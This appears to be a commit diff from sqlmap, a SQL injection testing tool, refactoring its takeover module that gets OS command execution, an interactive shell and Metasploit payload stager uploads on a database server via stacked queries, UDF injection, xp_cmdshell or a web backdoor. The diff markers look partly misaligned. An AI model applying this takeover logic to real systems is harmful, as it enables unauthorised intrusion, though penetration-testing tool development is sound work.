More code refactoring

2025-03-03 11:45:46 +03:00 · 2010-01-14 15:11:32 +00:00 · 2010-01-14 15:11:32 +00:00 · 1d968f51e9
commit 1d968f51e9
parent c9863bc1d2
2 changed files with 55 additions and 37 deletions
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@ -159,26 +159,27 @@ class Abstraction(Web, UDF, xp_cmdshell):
        self.__cmdShellCleanup()
-    def initEnv(self, mandatory=True, detailed=False):
+    def initEnv(self, mandatory=True, detailed=False, web=False):
        if self.envInitialized:
            return
-        self.checkDbmsOs(detailed)
+        if web:
-
+            self.webInit()
        if mandatory and not self.isDba():
            warnMsg  = "the functionality requested might not work because "
            warnMsg += "the session user is not a database administrator"
            logger.warn(warnMsg)
        if kb.dbms in ( "MySQL", "PostgreSQL" ):
            self.udfInjectCmd()
        elif kb.dbms == "Microsoft SQL Server":
            if mandatory:
                self.xpCmdshellInit()
        else:
-            errMsg = "feature not yet implemented for the back-end DBMS"
+            self.checkDbmsOs(detailed)
-            raise sqlmapUnsupportedFeatureException(errMsg)
+
            if mandatory and not self.isDba():
                warnMsg  = "the functionality requested might not work because "
                warnMsg += "the session user is not a database administrator"
                logger.warn(warnMsg)
            if kb.dbms in ( "MySQL", "PostgreSQL" ):
                self.udfInjectCmd()
            elif kb.dbms == "Microsoft SQL Server":
                if mandatory:
                    self.xpCmdshellInit()
            else:
                errMsg = "feature not yet implemented for the back-end DBMS"
                raise sqlmapUnsupportedFeatureException(errMsg)
        self.envInitialized = True
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@ -36,6 +36,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.exception import sqlmapNotVulnerableException
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.shell import autoCompletion
 from lib.request.connect import Connect as Request
@ -79,27 +80,35 @@ class Takeover(Abstraction, Metasploit, Registry):
    def osCmd(self):
        stackedTest()
-        if not kb.stackedTest:
+        if kb.stackedTest:
            web = False
        elif not kb.stackedTest and kb.dbms == "MySQL":
            web = True
            infoMsg = "going to use a web backdoor for command execution"
            logger.info(infoMsg)
            self.webInit()
        else:
-            self.initEnv()
+            errMsg  = "unable to execute operating system commands via "
            errMsg += "the back-end DBMS"
            raise sqlmapNotVulnerableException(errMsg)
        self.initEnv(web=web)
        self.runCmd(conf.osCmd)
    def osShell(self):
        stackedTest()
-        if not kb.stackedTest:
+        if kb.stackedTest:
            web = False
        elif not kb.stackedTest and kb.dbms == "MySQL":
            web = True
            infoMsg = "going to use a web backdoor for command prompt"
            logger.info(infoMsg)
            self.webInit()
        else:
-            self.initEnv()
+            errMsg  = "unable to prompt for an interactive operating "
            errMsg += "system shell via the back-end DBMS"
            raise sqlmapNotVulnerableException(errMsg)
        self.initEnv(web=web)
        self.shell()
    def osPwn(self):
@ -107,19 +116,10 @@ class Takeover(Abstraction, Metasploit, Registry):
        stackedTest()
-        if not kb.stackedTest:
+        if kb.stackedTest:
-            infoMsg  = "going to use a web backdoor to execute the "
+            web = False
            infoMsg += "payload stager"
            logger.info(infoMsg)
-            self.webInit()
+            self.initEnv(web=web)
            if self.webBackdoorUrl:
                self.getRemoteTempPath()
                self.createMsfPayloadStager()
                self.uploadMsfPayloadStager(web=True)
        else:
            self.initEnv()
            self.getRemoteTempPath()
            if kb.dbms in ( "MySQL", "PostgreSQL" ):
@ -184,6 +184,23 @@ class Takeover(Abstraction, Metasploit, Registry):
                # system is not Windows
                conf.privEsc = False
        elif not kb.stackedTest and kb.dbms == "MySQL":
            web = True
            infoMsg  = "going to use a web backdoor to execute the "
            infoMsg += "payload stager"
            logger.info(infoMsg)
            self.initEnv(web=web)
            if self.webBackdoorUrl:
                self.getRemoteTempPath()
                self.createMsfPayloadStager()
                self.uploadMsfPayloadStager(web=True)
        else:
            errMsg  = "unable to prompt for an out-of-band session via "
            errMsg += "the back-end DBMS"
            raise sqlmapNotVulnerableException(errMsg)
        self.pwn(goUdf)
    def osSmb(self):